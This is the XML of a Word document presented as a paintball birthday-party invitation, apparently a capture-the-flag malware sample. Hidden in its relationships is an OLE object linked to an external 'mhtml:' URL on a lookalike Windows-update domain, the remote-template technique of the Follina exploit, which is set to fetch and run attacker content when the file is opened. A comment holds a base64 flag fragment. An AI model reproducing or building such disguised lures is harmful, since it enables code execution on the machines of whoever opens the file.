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EDA863" w14:textId="77777777" w:rsidR="000B33DD" w:rsidRPr="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PAINTBALL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BIRTHDAY </w:t>
      </w:r>
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PARTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061952F" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="6AA52741" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="5CDFDA21" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHERE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00481214">
        <w:t>Bridgewater Canal, 53.4937°N, 2.4493°W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C004F3" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="6B8A9366" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHEN:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ON MY BIRTHDAY!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E45A7F1" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="11489402" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHO:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ALL MY FRIENDS AND YOUR +1s ARE INVITED!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862C0D5" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="6F8C7661" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="7AA6609E" w14:textId="77777777" w:rsidR="00481214" w:rsidRPr="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481214">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DO NOT FORGET: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD5977D" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Helmets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C218D9F" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additional protective gear </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42E63A" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Paintball ammo and machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07871444" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Food and snacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64213C55" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Good mood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A147B98" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="2ED65395" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:r>
        <w:t xml:space="preserve">If you (sadly) don’t remember when my birthday is, this should remind you: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F9439E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://fwesh.yonle.repl.co/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F513B0A" w14:textId="77777777" w:rsidR="00481214" w:rsidRDefault="00481214" w:rsidP="00481214"/>
    <w:p w14:paraId="1A52EC84" w14:textId="77777777" w:rsidR="00481214" w:rsidRPr="00481214" w:rsidRDefault="00481214" w:rsidP="00481214">
      <w:r>
        <w:t>See  you all there!!!</w:t>
      </w:r>
    </w:p>
    <w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C">
      <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t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.75pt;height:3.75pt" o:ole="">
        </v:shape>
      <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId1337" UpdateMode="OnCall">
        <o:LinkType>EnhancedMetaFile</o:LinkType>
        <o:LockedField>false</o:LockedField>
        <o:FieldCodes>\f 0</o:FieldCodes>
      </o:OLEObject>
    </w:object>
    <w:p w14:paraId="15AEA9D4" w14:textId="6B56B84E" w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3" w:rsidRDefault="00DA49F2" w:rsidP="00EE2BC3">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00DA49F2" w:rsidRPr="00EE2B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3CF"/>
    <w:rsid w:val="00803FB9"/>
    <w:rsid w:val="00C23139"/>
    <w:rsid w:val="00CD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0D466"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2397B527-A071-4178-80D0-2A5295D84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1214"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481214"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00481214"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00481214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4812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1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://windowsliveupdater.com:80/windowsupdate.html!x-usc:http://windowsliveupdater.com:80/windowsupdate.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/></Relationships>
<!--Relationship Id="rOlsk" Type=http://windowsliveupdater.com?Pt2=RjBsbGluYV9oNHNf--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2022-05-30T06:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T06:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>